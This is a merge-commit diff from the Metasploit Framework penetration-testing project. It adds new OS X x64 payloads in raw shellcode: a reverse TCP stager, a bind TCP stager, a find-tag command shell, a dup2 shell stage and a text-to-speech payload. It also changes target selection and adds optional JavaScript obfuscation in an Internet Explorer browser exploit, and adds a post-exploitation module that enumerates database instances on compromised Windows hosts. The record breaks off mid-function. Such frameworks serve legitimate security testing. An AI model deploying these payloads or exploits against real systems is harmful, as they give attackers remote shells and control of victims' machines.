Merge branch 'upstream-master'

bug/bundler_fix
Tod Beardsley 2012-09-25 08:28:38 -05:00
commit f54656f7b5
15 changed files with 748 additions and 56 deletions

Binary file not shown.

View File

@ -13,6 +13,7 @@ import java.awt.event.FocusListener;
import java.awt.event.MouseAdapter; import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent; import java.awt.event.MouseEvent;
import java.awt.event.MouseMotionAdapter; import java.awt.event.MouseMotionAdapter;
import java.awt.event.MouseMotionListener;
import java.awt.event.WindowEvent; import java.awt.event.WindowEvent;
import java.awt.event.WindowFocusListener; import java.awt.event.WindowFocusListener;
import java.util.ArrayList; import java.util.ArrayList;
@ -49,7 +50,16 @@ public class DraggableTabbedPane extends JTabbedPane{
static{ static{
//Set up placeholder window. (Shows when moving tabs) //Set up placeholder window. (Shows when moving tabs)
window = new JWindow(); window = new JWindow();
window.getContentPane().add(new JLabel("Moving", JLabel.CENTER), java.awt.BorderLayout.CENTER); JLabel lab = new JLabel("Moving", JLabel.CENTER);
lab.addMouseMotionListener(new MouseMotionListener() {
public void mouseMoved(MouseEvent e) {
window.setVisible(false);
}
public void mouseDragged(MouseEvent e) {
window.setVisible(false);
}
});
window.getContentPane().add(lab, java.awt.BorderLayout.CENTER);
window.setSize(300, 300); window.setSize(300, 300);
} }
@ -333,7 +343,7 @@ public class DraggableTabbedPane extends JTabbedPane{
//Set up dragging listener //Set up dragging listener
addMouseMotionListener(new MouseMotionAdapter() { addMouseMotionListener(new MouseMotionAdapter() {
public void mouseDragged(MouseEvent e) { public void mouseDragged(MouseEvent e) {
if (!dragging) { if (!dragging && ((e.getModifiersEx() & MouseEvent.BUTTON1_DOWN_MASK) != 0)) {
// Gets the tab index based on the mouse position // Gets the tab index based on the mouse position
int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY()); int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY());
if (tabNumber < 0) if (tabNumber < 0)

View File

@ -114,7 +114,8 @@ public abstract class RpcConnection {
* @throws IOException * @throws IOException
*/ */
protected void disconnect() throws SocketException, IOException{ protected void disconnect() throws SocketException, IOException{
connection.close(); if(connection != null)
connection.close();
} }
/** /**

View File

@ -6,7 +6,6 @@
## ##
require 'msf/core' require 'msf/core'
require 'json'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
@ -45,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary
], self.class) ], self.class)
end end
def run def run
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -63,6 +61,13 @@ class Metasploit3 < Msf::Auxiliary
return return
end end
begin
require 'json'
rescue LoadError
print_error("Json is not available on your machine")
return
end
begin begin
j = JSON.parse(res.body) j = JSON.parse(res.body)
@ -78,7 +83,6 @@ class Metasploit3 < Msf::Auxiliary
rescue JSON::ParserError rescue JSON::ParserError
print_error("Unable to parse JSON") print_error("Unable to parse JSON")
print_line(res.body) print_line(res.body)
end end
end end

View File

@ -25,10 +25,10 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info, super(update_info(info,
'Name' => 'HTTP Form Field Fuzzer', 'Name' => 'HTTP Form Field Fuzzer',
'Description' => %q{ 'Description' => %q{
This module will grab all fields from a form, This module will grab all fields from a form,
and launch a series of POST actions, fuzzing the contents and launch a series of POST actions, fuzzing the contents
of the form fields. You can optionally fuzz headers too of the form fields. You can optionally fuzz headers too
(option is enabled by default) (option is enabled by default)
}, },
'Author' => [ 'Author' => [
'corelanc0d3r', 'corelanc0d3r',
@ -69,28 +69,12 @@ class Metasploit3 < Msf::Auxiliary
proto = "https://" proto = "https://"
end end
useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
if datastore['UserAgent'] != nil
if datastore['UserAgent'].length > 0
useragent = datastore['UserAgent']
end
end
host = datastore['RHOST']
if datastore['VHOST']
if datastore['VHOST'].length > 0
host = datastore['VHOST']
end
end
@send_data = { @send_data = {
:uri => '', :uri => '',
:version => '1.1', :version => '1.1',
:method => 'POST', :method => 'POST',
:headers => { :headers => {
'Content-Length' => 100, 'Content-Length' => 100,
'Host' => host,
'User-Agent' => useragent,
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' => 'en-us,en;q=0.5', 'Accept-Language' => 'en-us,en;q=0.5',
'Accept-Encoding' => 'gzip,deflate', 'Accept-Encoding' => 'gzip,deflate',
@ -98,12 +82,10 @@ class Metasploit3 < Msf::Auxiliary
'Keep-Alive' => '300', 'Keep-Alive' => '300',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s, 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Type' => 'application/x-www-form-urlencoded'
} }
} }
@get_data_headers = { @get_data_headers = {
'Host' => host,
'User-Agent' => useragent,
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s, 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
} }
end end
@ -272,6 +254,8 @@ class Metasploit3 < Msf::Auxiliary
end end
datastr=datastr[0,datastr.length-1] datastr=datastr[0,datastr.length-1]
@send_data[:uri] = form[:action] @send_data[:uri] = form[:action]
@send_data[:uri] = "/#{form[:action]}" if @send_data[:uri][0,1] != '/'
@send_data[:method] = form[:method].upcase @send_data[:method] = form[:method].upcase
response = send_fuzz(@send_data,datastr) response = send_fuzz(@send_data,datastr)
if not process_response(response,field,"field") if not process_response(response,field,"field")
@ -322,7 +306,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def get_field_val(input) def get_field_val(input)
tmp = input.split(/=/) tmp = input.split(/\=/)
#get delimeter #get delimeter
tmp2 = tmp[1].strip tmp2 = tmp[1].strip
delim = tmp2[0,1] delim = tmp2[0,1]
@ -435,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
location = fielddata[0].index(thisfield) location = fielddata[0].index(thisfield)
delta = fielddata[0].size - location delta = fielddata[0].size - location
remaining = fielddata[0][location,delta] remaining = fielddata[0][location,delta]
tmp = remaining.strip.split(/=/) tmp = remaining.strip.split(/\=/)
if tmp.size > 1 if tmp.size > 1
delim = tmp[1][0,1] delim = tmp[1][0,1]
tmp2 = tmp[1].split(delim) tmp2 = tmp[1].split(delim)

View File

@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'References' => 'References' =>
[ [
['OSVDB', '85654'],
['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/'] ['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/']
], ],
'DefaultOptions' => 'DefaultOptions' =>

View File

@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'References' => 'References' =>
[ [
['OSVDB', '85554'],
['EDB', '21329'] ['EDB', '21329']
], ],
'Payload' => 'Payload' =>

View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'unknown', # Some secret ninja 'unknown', # via ZDI
'eromang', # First public discovery 'eromang', # First public discovery
'binjo', 'binjo',
'sinn3r', # Metasploit 'sinn3r', # Metasploit
@ -78,27 +78,40 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang 'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)
end end
def get_target(agent) def get_target(agent)
#If the user is already specified by the user, we'll just use that #If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic' return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
return targets[1] #IE 7 on Windows XP SP3 ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[2] #IE 8 on Windows XP SP3 ie_name = "IE #{ie}"
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[3] #IE 7 on Windows Vista case nt
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/ when '5.1'
return targets[4] #IE 8 on Windows Vista os_name = 'Windows XP SP3'
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/ when '6.0'
return targets[5] #IE 8 on Windows 7 os_name = 'Windows Vista'
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/ when '6.1'
return targets[6] #IE 9 on Windows 7 os_name = 'Windows 7'
else
return nil
end end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
vprint_status("Target selected as: #{t.name}")
return t
end
end
return nil
end end
def junk(n=4) def junk(n=4)
@ -283,8 +296,12 @@ class Metasploit3 < Msf::Exploit::Remote
end end
js = heaplib(js, {:noobfu => true}) js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
html = <<-EOS html = %Q|
<html> <html>
<body> <body>
<script> <script>
@ -299,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote
</script> </script>
</body> </body>
</html> </html>
EOS |
return html return html
end end
@ -335,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
print_status request.headers['User-Agent'] uri = request.uri
agent = request.headers['User-Agent'] agent = request.headers['User-Agent']
my_target = get_target(agent) my_target = get_target(agent)
vprint_status("Requesting: #{uri}")
print_status(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting # Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil? if my_target.nil?
print_error("Browser not supported, sending a 404: #{agent.to_s}") print_error("Browser not supported, sending a 404: #{agent.to_s}")
@ -346,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote
return return
end end
vprint_status("Requesting: #{request.uri}") if uri =~ /#{@html2_name}/
if request.uri =~ /#{@html2_name}/
print_status("Loading #{@html2_name}") print_status("Loading #{@html2_name}")
html = load_html2 html = load_html2
elsif request.uri =~ /#{@html1_name}/ elsif uri =~ /#{@html1_name}/
print_status("Loading #{@html1_name}") print_status("Loading #{@html1_name}")
html = load_html1(cli, my_target) html = load_html1(cli, my_target)
elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/ elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
print_status("Redirecting to #{@html1_name}") print_status("Redirecting to #{@html1_name}")
send_redirect(cli, "#{this_resource}/#{@html1_name}") send_redirect(cli, "#{this_resource}/#{@html1_name}")
return return

View File

@ -0,0 +1,53 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
module Metasploit3
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'OSX X64 say Shellcode',
'Version' => '$Revision$',
'Description' => 'Say an arbitrary string outloud using Mac OS X text2speech',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64
))
# exec payload options
register_options(
[
OptString.new('TEXT', [ true, "The text to say", "Hello\!"]),
], self.class)
end
# build the shellcode payload dynamically based on the user-provided CMD
def generate
say = (datastore['TEXT'] || '') << "\x00"
call = "\xe8" + [say.length + 0xd].pack('V')
payload =
"\x48\x31\xC0" + # xor rax,rax
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
call +
"/usr/bin/say\x00" +
say +
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
"\x4C\x8D\x57\x0D" + # lea r10,[rdi+0xd]
"\x48\x31\xD2" + # xor rdx,rdx
"\x52" + # push rdx
"\x41\x52" + # push r10
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x0F\x05" # loadall286
end
end

View File

@ -0,0 +1,84 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/find_tag'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Osx
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'OSX Command Shell, Find Tag Inline',
'Version' => '$Revision$',
'Description' => 'Spawn a shell on an established connection (proxy/nat safe)',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::FindTag,
'Session' => Msf::Sessions::CommandShellUnix
))
# exec payload options
register_options(
[
OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]),
OptString.new('TAG', [ true, "The tag to test for", "NEMO" ]),
], self.class)
end
#
# ensures the setting of tag to a four byte value
#
def generate
cmd = (datastore['CMD'] || '') << "\x00"
call = "\xe8" + [cmd.length].pack('V')
payload =
"\x48\x31\xFF" + # xor rdi,rdi
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x6A\x04" + # push byte +0x4
"\x5A" + # pop rdx
"\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xC9" + # xor r9,r9
"\x48\xFF\xCF" + # dec rdi
"\x48\xFF\xC7" + # inc rdi
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
datastore['TAG'] +
"\x75\xED" + # jnz 0x17
"\x48\x31\xC9" + # xor rcx,rcx
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
"\x48\x31\xF6" + # xor rsi,rsi
"\x0F\x05" + # loadall286
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
"\x48\xFF\xC6" + # inc rsi
"\x0F\x05" + # loadall286
"\x48\x31\xC0" + # xor rax,rax
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
call +
cmd +
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
"\x48\x31\xD2" + # xor rdx,rdx
"\x52" + # push rdx
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x0F\x05" # loadall286
end
end

View File

@ -0,0 +1,101 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
module Metasploit3
include Msf::Payload::Stager
def initialize(info = { })
super(merge_info(info,
'Name' => 'Bind TCP Stager',
'Version' => '$Revision$',
'Description' => 'Listen, read length, read buffer, execute',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::BindTcp,
'Convention' => 'sockedi',
'Stager' =>
{
'Offsets' => { 'LPORT' => [ 31, 'n'] },
'Payload' =>
"\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
"\x6A\x02" + # push byte +0x2
"\x5F" + # pop rdi
"\x6A\x01" + # push byte +0x1
"\x5E" + # pop rsi
"\x48\x31\xD2" + # xor rdx,rdx
"\x0F\x05" + # loadall286
"\x48\x89\xC7" + # mov rdi,rax
"\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
"\x48\x31\xF6" + # xor rsi,rsi
"\x56" + # push rsi
"\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
"\x56" + # push rsi
"\x48\x89\xE6" + # mov rsi,rsp
"\x6A\x10" + # push byte +0x10
"\x5A" + # pop rdx
"\x0F\x05" + # loadall286
"\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
"\x48\x31\xF6" + # xor rsi,rsi
"\x48\xFF\xC6" + # inc rsi
"\x49\x89\xFC" + # mov r12,rdi
"\x0F\x05" + # loadall286
"\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
"\x4C\x89\xE7" + # mov rdi,r12
"\x48\x89\xE6" + # mov rsi,rsp
"\x48\x89\xE2" + # mov rdx,rsp
"\x48\x83\xEA\x04" + # sub rdx,byte +0x4
"\x0F\x05" + # loadall286
"\x49\x89\xC5" + # mov r13,rax
"\x48\x89\xC7" + # mov rdi,rax
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x48\x31\xC9" + # xor rcx,rcx
"\x51" + # push rcx
"\x48\x89\xE6" + # mov rsi,rsp
"\xBA\x04\x00\x00\x00" + # mov edx,0x4
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xD2" + # xor r10,r10
"\x0F\x05" + # loadall286
"\x41\x5B" + # pop r11
"\x4C\x89\xDE" + # mov rsi,r11
"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
"\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
"\x48\x31\xFF" + # xor rdi,rdi
"\x48\xFF\xCF" + # dec rdi
"\xBA\x07\x00\x00\x00" + # mov edx,0x7
"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
"\x49\x89\xF8" + # mov r8,rdi
"\x4D\x31\xC9" + # xor r9,r9
"\x0F\x05" + # loadall286
"\x48\x89\xC6" + # mov rsi,rax
"\x56" + # push rsi
"\x4C\x89\xEF" + # mov rdi,r13
"\x48\x31\xC9" + # xor rcx,rcx
"\x4C\x89\xDA" + # mov rdx,r11
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xD2" + # xor r10,r10
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\x58" + # pop rax
"\xFF\xD0" # call rax
}
))
end
def handle_intermediate_stage(conn, p)
#
# Our stager payload expects to see a next-stage length first.
#
conn.put([p.length].pack('V'))
end
end

View File

@ -0,0 +1,57 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
module Metasploit3
include Msf::Payload::Stager
def initialize(info = { })
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Version' => '$Revision$',
'Description' => 'Connect, read length, read buffer, execute',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::ReverseTcp,
'Convention' => 'sockedi',
'Stager' =>
{
'Offsets' =>
{
'LHOST' => [ 37, 'ADDR'],
'LPORT' => [ 35, 'n']
},
'Payload' =>
"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
}
))
end
def handle_intermediate_stage(conn, p)
#
# Our stager payload expects to see a next-stage length first.
#
conn.put([p.length].pack('V'))
end
end

View File

@ -0,0 +1,38 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'OS X dup2 Command Shell',
'Version' => '$Revision$',
'Description' => 'dup2 socket in edi, then execve',
'Author' => 'nemo',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'Session' => Msf::Sessions::CommandShell,
'Stage' =>
{
'Payload' =>
"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
"\x52\x57\x48\x89\xe6\x0f\x05"
}
))
end
end

View File

@ -62,7 +62,8 @@ class Metasploit3 < Msf::Post
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ }, { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ }, { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ }, { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ } { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ },
{ :sig => "8bff558bec83ec50a1", :sigoffset => 0x97d3, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x9878, :os => /Windows XP.*Service Pack 3 - spanish/ }
] ]
unsupported if client.platform !~ /win32|win64/i unsupported if client.platform !~ /win32|win64/i

View File

@ -0,0 +1,339 @@
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'rex'
require 'msf/core'
require 'msf/core/post/file'
require 'msf/core/post/common'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Post::Common
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather Database Instance Enumeration',
'Description' => %q{ This module will enumerate a windows system for installed database instances },
'License' => MSF_LICENSE,
'Author' => [
'Barry Shteiman <barry[at]sectorix.com>', # Module author
'juan vazquez' # minor help
],
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
# method called when command run is issued
def run
results = []
print_status("Enumerating Databases on #{sysinfo['Computer']}")
if check_mssql
results += enumerate_mssql
end
if check_oracle
results += enumerate_oracle
end
if check_db2
results += enumerate_db2
end
if check_mysql
results += enumerate_mysql
end
if check_sybase
results += enumerate_sybase
end
if results.empty?
print_status("Done, No Databases were found")
return
end
print_status("Done, Databases Found.")
tbl = Rex::Ui::Text::Table.new(
'Header' => "Installed Databases",
'Indent' => 1,
'Columns' =>
[
"Type",
"Instance",
"Database",
"Port"
])
results.each { |r|
report_service(:host => session.sock.peerhost, :port => r[3], :name => r[0], :info => "#{r[0]}, #{r[1]}")
tbl << r
}
print_line(tbl.to_s)
p = store_loot("host.databases", "text/plain", session, tbl.to_s, "databases.txt", "Running Databases")
print_status("Results stored in: #{p}")
end
##### initial identification methods #####
# method for Checking if database instances are installed on host - mssql
def check_mssql
key = "HKLM\\SOFTWARE\\Microsoft"
if registry_enumkeys(key).include?("Microsoft SQL Server")
print_status("\tMicrosoft SQL Server found.")
return true
end
return false
rescue
return false
end
# method for Checking if database instances are installed on host - oracle
def check_oracle
key = "HKLM\\SOFTWARE\\Oracle"
if registry_enumkeys(key).include?("ALL_HOMES")
print_status("\tOracle Server found.")
return true
elsif registry_enumkeys(key).include?("SYSMAN")
print_status("\tOracle Server found.")
return true
end
return false
rescue
return false
end
# method for Checking if database instances are installed on host - db2
def check_db2
key = "HKLM\\SOFTWARE\\IBM\\DB2"
if registry_enumkeys(key).include?("GLOBAL_PROFILE")
print_status("\tDB2 Server found.")
return true
end
return false
rescue
return false
end
# method for Checking if database instances are installed on host - mysql
def check_mysql
key = "HKLM\\SOFTWARE"
if registry_enumkeys(key).include?("MySQL AB")
print_status("\tMySQL Server found.")
return true
end
return false
rescue
return false
end
# method for Checking if database instances are installed on host - sybase
def check_sybase
key = "HKLM\\SOFTWARE\\Sybase"
if registry_enumkeys(key).include?("SQLServer")
print_status("\tSybase Server found.")
return true
elsif registry_enumkeys(key).include?("Server")
print_status("\tSybase Server found.")
return true
end
return false
rescue
return false
end
##### deep analysis methods #####
# method to identify mssql instances
def enumerate_mssql
results = []
key = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL"
instances = registry_enumvals(key)
if not instances.nil? and not instances.empty?
instances.each do |i|
tcpkey = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\#{registry_getvaldata(key,i)}\\MSSQLServer\\SuperSocketNetLib\\Tcp\\IPAll"
tcpport = registry_getvaldata(tcpkey,"TcpPort")
print_good("\t\t+ #{registry_getvaldata(key,i)} (Port:#{tcpport})")
results << ["mssql","instance:#{registry_getvaldata(key,i)} port:#{tcpport}","Microsoft SQL Server",tcpport]
end
end
return results
rescue
print_error("\t\t! could not identify information")
return results || []
end
# method to identify oracle instances
def enumerate_oracle
results = []
basekey = "HKLM\\SOFTWARE\\Oracle\\SYSMAN"
instances = registry_enumkeys(basekey)
if instances.nil? or instances.empty?
print_error("\t\t! Oracle instances not found")
return results
end
instances.each do |i|
key = "#{basekey}\\#{i}"
val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")
val_ORACLE_HOME = registry_getvaldata(key,"ORACLE_HOME")
if not exist?(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
next
end
data_TNSNAMES = read_file(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
if data_TNSNAMES =~ /PORT\ \=\ (\d+)/
port = $1
print_good("\t\t+ #{val_ORACLE_SID} (Port:#{port})")
results << [ "oracle","instance:#{val_ORACLE_SID} port:#{port}","Oracle Database Server",port ]
else
print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
end
end
return results
rescue
print_error("\t\t! could not identify information")
return results || []
end
# method to identify mysql instances
def enumerate_mysql
results = []
basekey = "HKLM\\SOFTWARE\\MySQL AB"
instances = registry_enumkeys(basekey)
if instances.nil? or instances.empty?
return results
end
instances.each do |i|
key = "#{basekey}\\#{i}"
val_location = registry_getvaldata(key,"Location")
data = find_mysql_conf(val_location)
if data and data =~ /port\=(\d+)/
port = $1
print_good("\t\t+ MYSQL (Port:#{port})")
results << ["mysql","instance:MYSQL port:#{port}","MySQL Server",port]
else
print_error("\t\t! could not identify information")
end
end
return results
rescue
print_error("\t\t! could not identify information")
return results || []
end
# method to identify sybase instances
def enumerate_sybase
basekey = "HKLM\\SOFTWARE\\Sybase\\SQLServer"
instance = registry_getvaldata(basekey,"DSLISTEN")
location = registry_getvaldata(basekey,"RootDir")
results = []
if not exist?(location + "\\ini\\sql.ini")
print_error("\t\t! could not locate configuration file.")
return results
end
data = read_file(location + "\\ini\\sql.ini")
if data =~ /\[#{instance}\]([^\[]*)/
segment = $1
else
print_error("\t\t! couldnt locate information.")
return results
end
if segment =~ /master\=\w+\,[^\,]+\,(\d+)/
port = $1
else
print_error("\t\t! couldnt locate information.")
return results
end
print_good("\t\t+ #{instance} (Port:#{port})")
results << [ "sybase","instance:#{instance} port:#{port}","Sybase SQL Server",port ]
return results
rescue
print_error("\t\t! couldnt locate information.")
return results || []
end
# method to identify db2 instances
def enumerate_db2
results = []
cmd_i = cmd_exec("db2cmd", "-i -w /c db2ilist")
cmd_p = cmd_exec("db2cmd", "-i -w /c db2 get dbm cfg")
